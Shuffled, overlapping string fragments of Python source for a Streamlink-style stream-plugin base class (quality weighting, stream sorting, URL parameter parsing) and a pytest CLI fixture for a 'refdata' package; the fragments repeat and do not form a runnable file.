sorted_streams[0] final_sorted_streams[\"worst\"] = streams[worst] final_sorted_streams[\"best\"] =", "NORMAL_PRIORITY = 20 LOW_PRIORITY = 10 NO_PRIORITY = 0 def", "url.split(\" \", 1) url = split[0] params = split[1] if", "def can_handle_url(cls, url): raise NotImplementedError @classmethod def set_option(cls, key, value):", "list so we can reuse it. if ostreams: ostreams =", "url): raise NotImplementedError @classmethod def set_option(cls, key, value): cls.options.set(key, value)", "1 else '' return url, parse_params(params) def parse_params(params): rval =", "cls.options.set(key, value) @classmethod def get_option(cls, key): return cls.options.get(key) @classmethod def", "list of stream types to return. :param sorting_excludes: Specify which", "logger = None module = \"unknown\" options = Options() session", "from ..exceptions import PluginError, NoStreamsError from ..options import Options #", "def set_option(cls, key, value): cls.options.set(key, value) @classmethod def get_option(cls, key):", "int(match.group(1)) if match.group(3): # fps eg. 60p or 50p weight", ".. versionchanged:: 1.4.2 Added *priority* parameter. .. versionchanged:: 1.5.0 Renamed", "0 if match.group(6): if match.group(7): weight -= ALT_WEIGHT_MOD * int(match.group(7))", ".. versionchanged:: 1.6.0 *sorting_excludes* can now be a list of", "sorted_streams = sorted(iterate_streams(ostreams), key=partial(stream_type_priority, stream_types)) streams = {} for name,", "reuse it. if ostreams: ostreams = list(ostreams) except NoStreamsError: return", "= { \"<\": operator.lt, \"<=\": operator.le, \">\": operator.gt, \">=\": operator.ge,", "ranking. Valid operators are >, >=, < and <=. If", "a crude attempt at making a bitrate's # weight end", "name = \"{0}_alt\".format(name) num_alts = len(list(filter(lambda n: n.startswith(name), streams.keys()))) #", "versionchanged:: 1.5.0 Renamed *priority* to *stream_types* and changed behaviour slightly.", "name = name[:-len(\"_alt\")] existing = streams.get(name) if existing: existing_stream_type =", "= match.group(\"op\", \"value\") op = FILTER_OPERATORS.get(op, operator.eq) filter_weight, filter_group =", "ALT_WEIGHT_MOD * int(match.group(7)) else: weight -= ALT_WEIGHT_MOD name_type = match.group(2)", "return stream_weight(stream) @classmethod def default_stream_types(cls, streams): stream_types = [\"rtmp\", \"hls\",", "# Use * as wildcard to match other stream types", "iterator to a list so we can reuse it. if", "def __init__(self, url): self.url = url @classmethod def can_handle_url(cls, url):", "best/worst synonyms. .. versionchanged:: 1.4.2 Added *priority* parameter. .. versionchanged::", "name, stream in sorted_streams: stream_type = type(stream).shortname() # Use *", "stream_types.index(stream_type) except ValueError: try: prio = stream_types.index(\"*\") except ValueError: prio", "def stream_sorting_filter(expr, stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match:", "for sub_stream in stream: yield (name, sub_stream) else: yield (name,", "streams: if isinstance(stream, list): for sub_stream in stream: yield (name,", "been renamed to :func:`Plugin.streams`, this is an alias for backwards", "module cls.session = session def __init__(self, url): self.url = url", "import OrderedDict from functools import partial from ..cache import Cache", "returns NORMAL priority. :return: priority level \"\"\" return NORMAL_PRIORITY def", "\"\"\"Attempts to extract available streams. Returns a :class:`dict` containing the", "operator.gt, \">=\": operator.ge, } PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\" HIGH_PRIORITY = 30", "cls.cache = Cache(filename=\"plugin-cache.json\", key_prefix=module) cls.logger = session.logger.new_module(\"plugin.\" + module) cls.module", "BIT_RATE_WEIGHT_RATIO = 2.8 ALT_WEIGHT_MOD = 0.01 QUALITY_WEIGTHS_EXTRA = { \"other\":", "in matches: try: value = ast.literal_eval(value) except Exception: pass rval[key]", "session def __init__(self, url): self.url = url @classmethod def can_handle_url(cls,", "value = match.group(\"op\", \"value\") op = FILTER_OPERATORS.get(op, operator.eq) filter_weight, filter_group", "< and <=. If no operator is specified then equality", "can retrieve stream information from the URL specified. :param url:", "rval[key] = value return rval class Plugin(object): \"\"\"A plugin can", "+= int(match.group(1)) if match.group(3): # fps eg. 60p or 50p", "priority for a given URL, by default it returns NORMAL", "weight, \"bitrate\" elif name_type == \"p\": # resolution weight +=", "BIT_RATE_WEIGHT_RATIO return weight, \"bitrate\" elif name_type == \"p\": # resolution", "streams specified in *stream_types* will determine which stream gets to", "A list of filter expressions in the format *[operator]<value>*. For", "to exclude from the best/worst synonyms. .. versionchanged:: 1.4.2 Added", "stream information from the URL specified. :param url: URL that", "synonyms. .. versionchanged:: 1.4.2 Added *priority* parameter. .. versionchanged:: 1.5.0", "ast.literal_eval(value) except Exception: pass rval[key] = value return rval class", "= None module = \"unknown\" options = Options() session =", "= url @classmethod def can_handle_url(cls, url): raise NotImplementedError @classmethod def", "= int(match.group(1)) weight += bitrate / BIT_RATE_WEIGHT_RATIO return weight, \"bitrate\"", "can be either of these types: - A list of", "576, }, \"quality\": { \"ehq\": 720, \"hq\": 576, \"sq\": 360,", "information from the URL specified. :param url: URL that the", "* int(match.group(7)) else: weight -= ALT_WEIGHT_MOD name_type = match.group(2) if", "slightly. .. versionchanged:: 1.5.0 Added *sorting_excludes* parameter. .. versionchanged:: 1.6.0", "if isinstance(ostreams, dict): ostreams = ostreams.items() # Flatten the iterator", "720, \"hq\": 576, \"sq\": 360, }, } FILTER_OPERATORS = {", "Flatten the iterator to a list so we can reuse", "(IOError, OSError, ValueError) as err: raise PluginError(err) if not ostreams:", "def stream_weight_only(s): return (self.stream_weight(s)[0] or (len(streams) == 1 and 1))", "synonmys def stream_weight_only(s): return (self.stream_weight(s)[0] or (len(streams) == 1 and", "key=stream_weight_only): final_sorted_streams[stream_name] = streams[stream_name] if len(sorted_streams) > 0: best =", "= 10 NO_PRIORITY = 0 def stream_weight(stream): for group, weights", "if existing: existing_stream_type = type(existing).shortname() if existing_stream_type != stream_type: name", "1080, \"sd\": 576, }, \"quality\": { \"ehq\": 720, \"hq\": 576,", "return stream_types @classmethod def broken(cls, issue=None): def func(*args, **kwargs): msg", "'{0}' has been ignored \" \"since it is badly named.\",", "return {} except (IOError, OSError, ValueError) as err: raise PluginError(err)", "*priority* parameter. .. versionchanged:: 1.5.0 Renamed *priority* to *stream_types* and", "and <=. If no operator is specified then equality will", "\"hds\", \"http\"] for name, stream in iterate_streams(streams): stream_type = type(stream).shortname()", "to return. :param sorting_excludes: Specify which streams to exclude from", "stream_types.index(\"*\") except ValueError: prio = 99 return prio def stream_sorting_filter(expr,", "def stream_weight(cls, stream): return stream_weight(stream) @classmethod def default_stream_types(cls, streams): stream_types", "a working implementation. \" ) if issue: msg += \"More", "try: ostreams = self._get_streams() if isinstance(ostreams, dict): ostreams = ostreams.items()", "underscore. streams[name.lower()] = stream # Create the best/worst synonmys def", "> 1 else '' return url, parse_params(params) def parse_params(params): rval", "filter_group: return not op(weight, filter_weight) return True return func def", "None @classmethod def bind(cls, session, module): cls.cache = Cache(filename=\"plugin-cache.json\", key_prefix=module)", "\"unknown\" options = Options() session = None @classmethod def bind(cls,", "True return func def parse_url_params(url): split = url.split(\" \", 1)", "stream_weight(value) def func(quality): weight, group = stream_weight(quality) if group ==", "end up similar to the weight of a resolution. #", "None module = \"unknown\" options = Options() session = None", "been marked as broken. This is likely due to \"", "import partial from ..cache import Cache from ..exceptions import PluginError,", "at making a bitrate's # weight end up similar to", "bitrate's # weight end up similar to the weight of", "similar to the weight of a resolution. # Someone who", "streams ranked higher than \"480p\" from the list used in", "key=stream_weight_only) if isinstance(sorting_excludes, list): for expr in sorting_excludes: filter_func =", "list(filter(sorting_excludes, sorted_streams)) final_sorted_streams = OrderedDict() for stream_name in sorted(streams, key=stream_weight_only):", "plugin has been marked as broken. This is likely due", "re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream) if match: weight = 0 if match.group(6): if", "bad. match = re.match(\"([A-z0-9_+]+)\", name) if match: name = match.group(1)", "weights: return weights[stream], group match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream) if match:", "list of filter expressions or a function that is passed", "for name, stream in sorted_streams: stream_type = type(stream).shortname() # Use", "return url, parse_params(params) def parse_params(params): rval = {} matches =", "= ast.literal_eval(value) except Exception: pass rval[key] = value return rval", "1.5.0 Added *sorting_excludes* parameter. .. versionchanged:: 1.6.0 *sorting_excludes* can now", "def priority(cls, url): \"\"\" Return the plugin priority for a", "the synonyms **best** and **worst** which points to the streams", "= stream # Create the best/worst synonmys def stream_weight_only(s): return", "other stream types if \"*\" not in stream_types and stream_type", "type(existing).shortname() if existing_stream_type != stream_type: name = \"{0}_{1}\".format(name, stream_type) if", "-= ALT_WEIGHT_MOD name_type = match.group(2) if name_type == \"k\": #", "final_sorted_streams def get_streams(self, *args, **kwargs): \"\"\"Deprecated since version 1.9.0. Has", "10 NO_PRIORITY = 0 def stream_weight(stream): for group, weights in", "from the list used in the synonyms ranking. Valid operators", "not in stream_types and stream_type not in stream_types: continue #", "depending on stream type and priorities sorted_streams = sorted(iterate_streams(ostreams), key=partial(stream_type_priority,", "result can contain the synonyms **best** and **worst** which points", "return weight, \"bitrate\" elif name_type == \"p\": # resolution weight", "of the stream, most commonly the quality and the value", "self.default_stream_types(ostreams) # Add streams depending on stream type and priorities", "= re.match(\"([A-z0-9_+]+)\", name) if match: name = match.group(1) else: self.logger.debug(\"The", "import operator import re from collections import OrderedDict from functools", "filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list): for", "the iterator to a list so we can reuse it.", "or 50p weight += int(match.group(3)) if match.group(4) == \"+\": weight", "def streams(self, stream_types=None, sorting_excludes=None): \"\"\"Attempts to extract available streams. Returns", "prio = stream_types.index(stream_type) except ValueError: try: prio = stream_types.index(\"*\") except", "if issue: msg += \"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg) def", "the plugin priority for a given URL, by default it", "name.endswith(\"_alt\"): name = name[:-len(\"_alt\")] existing = streams.get(name) if existing: existing_stream_type", "if len(sorted_streams) > 0: best = sorted_streams[-1] worst = sorted_streams[0]", "def stream_type_priority(stream_types, stream): stream_type = type(stream[1]).shortname() try: prio = stream_types.index(stream_type)", "operate on \"\"\" cache = None logger = None module", "Create the best/worst synonmys def stream_weight_only(s): return (self.stream_weight(s)[0] or (len(streams)", "50p weight += int(match.group(3)) if match.group(4) == \"+\": weight +=", "pass rval[key] = value return rval class Plugin(object): \"\"\"A plugin", "def parse_url_params(url): split = url.split(\" \", 1) url = split[0]", "the stream if it's bad. match = re.match(\"([A-z0-9_+]+)\", name) if", "url @classmethod def can_handle_url(cls, url): raise NotImplementedError @classmethod def set_option(cls,", "value in matches: try: value = ast.literal_eval(value) except Exception: pass", "*args, **kwargs): \"\"\"Deprecated since version 1.9.0. Has been renamed to", "\"hq\": 576, \"sq\": 360, }, } FILTER_OPERATORS = { \"<\":", "these types: - A list of filter expressions in the", "retrieve stream information from the URL specified. :param url: URL", "existing: existing_stream_type = type(existing).shortname() if existing_stream_type != stream_type: name =", "@classmethod def default_stream_types(cls, streams): stream_types = [\"rtmp\", \"hls\", \"hds\", \"http\"]", "**kwargs): return func return decorator @classmethod def priority(cls, url): \"\"\"", "drop _alt from any stream names if name.endswith(\"_alt\"): name =", "stream: yield (name, sub_stream) else: yield (name, stream) def stream_type_priority(stream_types,", "match.group(5): # bit rate classifier for resolution weight += int(match.group(5))", "filter_func = stream_sorting_filter(expr, self.stream_weight) sorted_streams = list(filter(filter_func, sorted_streams)) elif callable(sorting_excludes):", "points to the streams which are likely to be of", "if group == filter_group: return not op(weight, filter_weight) return True", "bind(cls, session, module): cls.cache = Cache(filename=\"plugin-cache.json\", key_prefix=module) cls.logger = session.logger.new_module(\"plugin.\"", "specified then equality will be tested. - A function that", "stream_sorting_filter(expr, self.stream_weight) sorted_streams = list(filter(filter_func, sorted_streams)) elif callable(sorting_excludes): sorted_streams =", "stream) def stream_type_priority(stream_types, stream): stream_type = type(stream[1]).shortname() try: prio =", "20 LOW_PRIORITY = 10 NO_PRIORITY = 0 def stream_weight(stream): for", "with underscore. streams[name.lower()] = stream # Create the best/worst synonmys", "is passed to filter() with a list of stream names", "sorting_excludes: Specify which streams to exclude from the best/worst synonyms.", "= filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list):", "parse_url_params(url): split = url.split(\" \", 1) url = split[0] params", "err: raise PluginError(err) if not ostreams: return {} if stream_types", "The result can contain the synonyms **best** and **worst** which", "can reuse it. if ostreams: ostreams = list(ostreams) except NoStreamsError:", "except NoStreamsError: return {} except (IOError, OSError, ValueError) as err:", "than 2 alt streams if num_alts >= 2: continue elif", "\" \"since it is badly named.\", name) continue # Force", "in streams: if isinstance(stream, list): for sub_stream in stream: yield", "{0}\".format(expr)) op, value = match.group(\"op\", \"value\") op = FILTER_OPERATORS.get(op, operator.eq)", "stream name and discard the stream if it's bad. match", "replace space with underscore. streams[name.lower()] = stream # Create the", "sorted_streams = sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes, list): for expr in", "2: continue elif num_alts > 0: name = \"{0}{1}\".format(name, num_alts", "a resolution. # Someone who knows math, please fix. BIT_RATE_WEIGHT_RATIO", "}, } FILTER_OPERATORS = { \"<\": operator.lt, \"<=\": operator.le, \">\":", "= name[:-len(\"_alt\")] existing = streams.get(name) if existing: existing_stream_type = type(existing).shortname()", "n: n.startswith(name), streams.keys()))) # We shouldn't need more than 2", "(name, sub_stream) else: yield (name, stream) def stream_type_priority(stream_types, stream): stream_type", "1 and 1)) stream_names = filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names,", "a :class:`dict` containing the streams, where the key is the", "match = re.match(r\"^(\\d+)(k|p)?(\\d+)?(\\+)?(?:_(\\d+)k)?(?:_(alt)(\\d)?)?$\", stream) if match: weight = 0 if", "stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match: raise PluginError(\"Invalid", "NoStreamsError from ..options import Options # FIXME: This is a", "a list of stream names as input. :param stream_types: A", "+= int(match.group(3)) if match.group(4) == \"+\": weight += 1 if", "not in stream_types: stream_types.append(stream_type) return stream_types @classmethod def broken(cls, issue=None):", "\"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg) def decorator(*args, **kwargs): return func", "= [\"rtmp\", \"hls\", \"hds\", \"http\"] for name, stream in iterate_streams(streams):", "info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg) def decorator(*args, **kwargs): return func return", "n.startswith(name), streams.keys()))) # We shouldn't need more than 2 alt", "raise PluginError(msg) def decorator(*args, **kwargs): return func return decorator @classmethod", "likely due to \" \"changes to the service preventing a", "the same name are found, the order of streams specified", "lowercase name and replace space with underscore. streams[name.lower()] = stream", "!= stream_type: name = \"{0}_{1}\".format(name, stream_type) if name in streams:", "in stream_types: stream_types.append(stream_type) return stream_types @classmethod def broken(cls, issue=None): def", "60p or 50p weight += int(match.group(3)) if match.group(4) == \"+\":", "stream_types=None, sorting_excludes=None): \"\"\"Attempts to extract available streams. Returns a :class:`dict`", "wildcard to match other stream types if \"*\" not in", "stream in sorted_streams: stream_type = type(stream).shortname() # Use * as", "the stream, most commonly the quality and the value is", "def broken(cls, issue=None): def func(*args, **kwargs): msg = ( \"This", "name of the stream, most commonly the quality and the", "will determine which stream gets to keep the name while", ".. versionchanged:: 1.5.0 Added *sorting_excludes* parameter. .. versionchanged:: 1.6.0 *sorting_excludes*", "continue # drop _alt from any stream names if name.endswith(\"_alt\"):", "stream): return stream_weight(stream) @classmethod def default_stream_types(cls, streams): stream_types = [\"rtmp\",", "if it's bad. match = re.match(\"([A-z0-9_+]+)\", name) if match: name", "space with underscore. streams[name.lower()] = stream # Create the best/worst", "options = Options() session = None @classmethod def bind(cls, session,", "weight += bitrate / BIT_RATE_WEIGHT_RATIO return weight, \"bitrate\" elif name_type", "continue # Force lowercase name and replace space with underscore.", "op = FILTER_OPERATORS.get(op, operator.eq) filter_weight, filter_group = stream_weight(value) def func(quality):", "best/worst synonmys def stream_weight_only(s): return (self.stream_weight(s)[0] or (len(streams) == 1", "*sorting_excludes* can now be a list of filter expressions or", "not match: raise PluginError(\"Invalid filter expression: {0}\".format(expr)) op, value =", "\"<=\": operator.le, \">\": operator.gt, \">=\": operator.ge, } PARAMS_REGEX = r\"(\\w+)=({.+?}|\\[.+?\\]|\\(.+?\\)|'(?:[^'\\\\]|\\\\')*'|\\\"(?:[^\\\"\\\\]|\\\\\\\")*\\\"|\\S+)\"", "# drop _alt from any stream names if name.endswith(\"_alt\"): name", "= len(list(filter(lambda n: n.startswith(name), streams.keys()))) # We shouldn't need more", "op(weight, filter_weight) return True return func def parse_url_params(url): split =", ") if issue: msg += \"More info: https://github.com/streamlink/streamlink/issues/{0}\".format(issue) raise PluginError(msg)", "of highest and lowest quality respectively. If multiple streams with", "with the same name are found, the order of streams", "# Add streams depending on stream type and priorities sorted_streams", "= module cls.session = session def __init__(self, url): self.url =", "priority level \"\"\" return NORMAL_PRIORITY def streams(self, stream_types=None, sorting_excludes=None): \"\"\"Attempts", "url: URL that the plugin will operate on \"\"\" cache", "where the key is the name of the stream, most", "filter \">480p\" will exclude streams ranked higher than \"480p\" from", "stream_weight_only(s): return (self.stream_weight(s)[0] or (len(streams) == 1 and 1)) stream_names", "in sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name] = streams[stream_name] if len(sorted_streams) > 0:", "in QUALITY_WEIGTHS_EXTRA.items(): if stream in weights: return weights[stream], group match", "**best** and **worst** which points to the streams which are", "with a list of stream names as input. :param stream_types:", "name while the rest will be renamed to \"<name>_<stream type>\".", "if not ostreams: return {} if stream_types is None: stream_types", "isinstance(stream, list): for sub_stream in stream: yield (name, sub_stream) else:", "<=. If no operator is specified then equality will be", "issue=None): def func(*args, **kwargs): msg = ( \"This plugin has", "1) url = split[0] params = split[1] if len(split) >", "if isinstance(stream, list): for sub_stream in stream: yield (name, sub_stream)", "func return decorator @classmethod def priority(cls, url): \"\"\" Return the", "final_sorted_streams[stream_name] = streams[stream_name] if len(sorted_streams) > 0: best = sorted_streams[-1]", "This is a crude attempt at making a bitrate's #", "raise PluginError(\"Invalid filter expression: {0}\".format(expr)) op, value = match.group(\"op\", \"value\")", "except (IOError, OSError, ValueError) as err: raise PluginError(err) if not", "360, }, } FILTER_OPERATORS = { \"<\": operator.lt, \"<=\": operator.le,", "higher than \"480p\" from the list used in the synonyms", "value): cls.options.set(key, value) @classmethod def get_option(cls, key): return cls.options.get(key) @classmethod", "the streams, where the key is the name of the", "re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\", expr) if not match: raise PluginError(\"Invalid filter expression: {0}\".format(expr))", "collections import OrderedDict from functools import partial from ..cache import", "**worst** which points to the streams which are likely to", "+ 1) # Validate stream name and discard the stream", "def bind(cls, session, module): cls.cache = Cache(filename=\"plugin-cache.json\", key_prefix=module) cls.logger =", "working implementation. \" ) if issue: msg += \"More info:", "in stream_types: continue # drop _alt from any stream names", "stream_name in sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name] = streams[stream_name] if len(sorted_streams) >", "FIXME: This is a crude attempt at making a bitrate's", "eg. 60p or 50p weight += int(match.group(3)) if match.group(4) ==", "prio = stream_types.index(\"*\") except ValueError: prio = 99 return prio", "= streams[stream_name] if len(sorted_streams) > 0: best = sorted_streams[-1] worst", "type(stream).shortname() if stream_type not in stream_types: stream_types.append(stream_type) return stream_types @classmethod", "return decorator @classmethod def priority(cls, url): \"\"\" Return the plugin", "stream_names = filter(stream_weight_only, streams.keys()) sorted_streams = sorted(stream_names, key=stream_weight_only) if isinstance(sorting_excludes,", "iterate_streams(streams): for name, stream in streams: if isinstance(stream, list): for", "compatibility. \"\"\" return self.streams(*args, **kwargs) def _get_streams(self): raise NotImplementedError __all__", "named.\", name) continue # Force lowercase name and replace space", "\"value\") op = FILTER_OPERATORS.get(op, operator.eq) filter_weight, filter_group = stream_weight(value) def", "streams): stream_types = [\"rtmp\", \"hls\", \"hds\", \"http\"] for name, stream", "\"\"\" try: ostreams = self._get_streams() if isinstance(ostreams, dict): ostreams =", "final_sorted_streams = OrderedDict() for stream_name in sorted(streams, key=stream_weight_only): final_sorted_streams[stream_name] =", "> 0: best = sorted_streams[-1] worst = sorted_streams[0] final_sorted_streams[\"worst\"] =", "NORMAL priority. :return: priority level \"\"\" return NORMAL_PRIORITY def streams(self,", "to \" \"changes to the service preventing a working implementation.", "existing = streams.get(name) if existing: existing_stream_type = type(existing).shortname() if existing_stream_type", ">, >=, < and <=. If no operator is specified", ">= 2: continue elif num_alts > 0: name = \"{0}{1}\".format(name,", "operator import re from collections import OrderedDict from functools import", "resolution. # Someone who knows math, please fix. BIT_RATE_WEIGHT_RATIO =", "{} matches = re.findall(PARAMS_REGEX, params) for key, value in matches:", "cache = None logger = None module = \"unknown\" options", "{ \"live\": 1080, }, \"tv\": { \"hd\": 1080, \"sd\": 576,", "of stream names as input. :param stream_types: A list of", "callable(sorting_excludes): sorted_streams = list(filter(sorting_excludes, sorted_streams)) final_sorted_streams = OrderedDict() for stream_name", "since version 1.9.0. Has been renamed to :func:`Plugin.streams`, this is", "alias for backwards compatibility. \"\"\" return self.streams(*args, **kwargs) def _get_streams(self):", "and **worst** which points to the streams which are likely", "weight = 0 if match.group(6): if match.group(7): weight -= ALT_WEIGHT_MOD", ":param sorting_excludes: Specify which streams to exclude from the best/worst", "module = \"unknown\" options = Options() session = None @classmethod", "= 99 return prio def stream_sorting_filter(expr, stream_weight): match = re.match(r\"(?P<op><=|>=|<|>)?(?P<value>[\\w+]+)\",", "# weight end up similar to the weight of a", "A function that is passed to filter() with a list", "+ module) cls.module = module cls.session = session def __init__(self,", "for group, weights in QUALITY_WEIGTHS_EXTRA.items(): if stream in weights: return", "match.group(\"op\", \"value\") op = FILTER_OPERATORS.get(op, operator.eq) filter_weight, filter_group = stream_weight(value)", "except ValueError: try: prio = stream_types.index(\"*\") except ValueError: prio =", "sub_stream) else: yield (name, stream) def stream_type_priority(stream_types, stream): stream_type =", "are >, >=, < and <=. If no operator is", "1.5.0 Renamed *priority* to *stream_types* and changed behaviour slightly. ..", "1.6.0 *sorting_excludes* can now be a list of filter expressions", "**kwargs): msg = ( \"This plugin has been marked as", "[\"rtmp\", \"hls\", \"hds\", \"http\"] for name, stream in iterate_streams(streams): stream_type" ]
[ "details. \"\"\"Fixtures for testing the command-line interface.\"\"\" import os import", "LICENSE file for more details. \"\"\"Fixtures for testing the command-line", "= basedir os.environ[config.ENV_URL] = connect_url # Make sure to reset", "database. yield CliRunner() # Clear environment variables that were set", "DB(connect_url=connect_url).init() os.environ[config.ENV_BASEDIR] = basedir os.environ[config.ENV_URL] = connect_url # Make sure", "import pytest from click.testing import CliRunner from refdata.db import DB", "connect_url # Make sure to reset the database. yield CliRunner()", "Reference Data Repository (refdata). # # Copyright (C) 2021 New", "Repository (refdata). # # Copyright (C) 2021 New York University.", "refdata is free software; you can redistribute it and/or modify", "connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db')) DB(connect_url=connect_url).init() os.environ[config.ENV_BASEDIR] = basedir os.environ[config.ENV_URL] =", "\"\"\"Initialize the environment and the database for the local store.\"\"\"", "software; you can redistribute it and/or modify it under the", "the command-line interface.\"\"\" import os import pytest from click.testing import", "you can redistribute it and/or modify it under the #", "basedir os.environ[config.ENV_URL] = connect_url # Make sure to reset the", "sure to reset the database. yield CliRunner() # Clear environment", "part of the Reference Data Repository (refdata). # # Copyright", "and/or modify it under the # terms of the MIT", "2021 New York University. # # refdata is free software;", "= os.path.abspath(str(tmpdir)) connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db')) DB(connect_url=connect_url).init() os.environ[config.ENV_BASEDIR] = basedir", "more details. \"\"\"Fixtures for testing the command-line interface.\"\"\" import os", "that were set for the test runner. del os.environ[config.ENV_BASEDIR] del", "Make sure to reset the database. yield CliRunner() # Clear", "as config @pytest.fixture def refdata_cli(tmpdir): \"\"\"Initialize the environment and the", "the database. yield CliRunner() # Clear environment variables that were", "see LICENSE file for more details. \"\"\"Fixtures for testing the", "can redistribute it and/or modify it under the # terms", "University. # # refdata is free software; you can redistribute", "= connect_url # Make sure to reset the database. yield", "os.environ[config.ENV_URL] = connect_url # Make sure to reset the database.", "Data Repository (refdata). # # Copyright (C) 2021 New York", "York University. # # refdata is free software; you can", "# Make sure to reset the database. yield CliRunner() #", "reset the database. yield CliRunner() # Clear environment variables that", "import refdata.config as config @pytest.fixture def refdata_cli(tmpdir): \"\"\"Initialize the environment", "# # refdata is free software; you can redistribute it", "# Copyright (C) 2021 New York University. # # refdata", "os import pytest from click.testing import CliRunner from refdata.db import", "local store.\"\"\" basedir = os.path.abspath(str(tmpdir)) connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db')) DB(connect_url=connect_url).init()", "Clear environment variables that were set for the test runner.", "environment and the database for the local store.\"\"\" basedir =", "the environment and the database for the local store.\"\"\" basedir", "This file is part of the Reference Data Repository (refdata).", "the Reference Data Repository (refdata). # # Copyright (C) 2021", "command-line interface.\"\"\" import os import pytest from click.testing import CliRunner", "the MIT License; see LICENSE file for more details. \"\"\"Fixtures", "yield CliRunner() # Clear environment variables that were set for", "is free software; you can redistribute it and/or modify it", "environment variables that were set for the test runner. del", "free software; you can redistribute it and/or modify it under", "import os import pytest from click.testing import CliRunner from refdata.db", "from refdata.db import DB import refdata.config as config @pytest.fixture def", "for the local store.\"\"\" basedir = os.path.abspath(str(tmpdir)) connect_url = 'sqlite:///{}'.format(os.path.join(basedir,", "refdata.db import DB import refdata.config as config @pytest.fixture def refdata_cli(tmpdir):", "database for the local store.\"\"\" basedir = os.path.abspath(str(tmpdir)) connect_url =", "file for more details. \"\"\"Fixtures for testing the command-line interface.\"\"\"", "config @pytest.fixture def refdata_cli(tmpdir): \"\"\"Initialize the environment and the database", "file is part of the Reference Data Repository (refdata). #", "is part of the Reference Data Repository (refdata). # #", "'test.db')) DB(connect_url=connect_url).init() os.environ[config.ENV_BASEDIR] = basedir os.environ[config.ENV_URL] = connect_url # Make", "License; see LICENSE file for more details. \"\"\"Fixtures for testing", "it under the # terms of the MIT License; see", "CliRunner() # Clear environment variables that were set for the", "os.environ[config.ENV_BASEDIR] = basedir os.environ[config.ENV_URL] = connect_url # Make sure to", "under the # terms of the MIT License; see LICENSE", "def refdata_cli(tmpdir): \"\"\"Initialize the environment and the database for the", "# Clear environment variables that were set for the test", "the # terms of the MIT License; see LICENSE file", "redistribute it and/or modify it under the # terms of", "the local store.\"\"\" basedir = os.path.abspath(str(tmpdir)) connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db'))", "Copyright (C) 2021 New York University. # # refdata is", "refdata.config as config @pytest.fixture def refdata_cli(tmpdir): \"\"\"Initialize the environment and", "import CliRunner from refdata.db import DB import refdata.config as config", "import DB import refdata.config as config @pytest.fixture def refdata_cli(tmpdir): \"\"\"Initialize", "interface.\"\"\" import os import pytest from click.testing import CliRunner from", "store.\"\"\" basedir = os.path.abspath(str(tmpdir)) connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db')) DB(connect_url=connect_url).init() os.environ[config.ENV_BASEDIR]", "MIT License; see LICENSE file for more details. \"\"\"Fixtures for", "click.testing import CliRunner from refdata.db import DB import refdata.config as", "# This file is part of the Reference Data Repository", "\"\"\"Fixtures for testing the command-line interface.\"\"\" import os import pytest", "= 'sqlite:///{}'.format(os.path.join(basedir, 'test.db')) DB(connect_url=connect_url).init() os.environ[config.ENV_BASEDIR] = basedir os.environ[config.ENV_URL] = connect_url", "# refdata is free software; you can redistribute it and/or", "for more details. \"\"\"Fixtures for testing the command-line interface.\"\"\" import", "and the database for the local store.\"\"\" basedir = os.path.abspath(str(tmpdir))", "of the Reference Data Repository (refdata). # # Copyright (C)", "the database for the local store.\"\"\" basedir = os.path.abspath(str(tmpdir)) connect_url", "basedir = os.path.abspath(str(tmpdir)) connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db')) DB(connect_url=connect_url).init() os.environ[config.ENV_BASEDIR] =", "# # Copyright (C) 2021 New York University. # #", "pytest from click.testing import CliRunner from refdata.db import DB import", "CliRunner from refdata.db import DB import refdata.config as config @pytest.fixture", "variables that were set for the test runner. del os.environ[config.ENV_BASEDIR]", "modify it under the # terms of the MIT License;", "New York University. # # refdata is free software; you", "refdata_cli(tmpdir): \"\"\"Initialize the environment and the database for the local", "for testing the command-line interface.\"\"\" import os import pytest from", "were set for the test runner. del os.environ[config.ENV_BASEDIR] del os.environ[config.ENV_URL]", "(refdata). # # Copyright (C) 2021 New York University. #", "it and/or modify it under the # terms of the", "'sqlite:///{}'.format(os.path.join(basedir, 'test.db')) DB(connect_url=connect_url).init() os.environ[config.ENV_BASEDIR] = basedir os.environ[config.ENV_URL] = connect_url #", "of the MIT License; see LICENSE file for more details.", "from click.testing import CliRunner from refdata.db import DB import refdata.config", "# terms of the MIT License; see LICENSE file for", "DB import refdata.config as config @pytest.fixture def refdata_cli(tmpdir): \"\"\"Initialize the", "to reset the database. yield CliRunner() # Clear environment variables", "terms of the MIT License; see LICENSE file for more", "(C) 2021 New York University. # # refdata is free", "@pytest.fixture def refdata_cli(tmpdir): \"\"\"Initialize the environment and the database for", "testing the command-line interface.\"\"\" import os import pytest from click.testing", "os.path.abspath(str(tmpdir)) connect_url = 'sqlite:///{}'.format(os.path.join(basedir, 'test.db')) DB(connect_url=connect_url).init() os.environ[config.ENV_BASEDIR] = basedir os.environ[config.ENV_URL]" ]
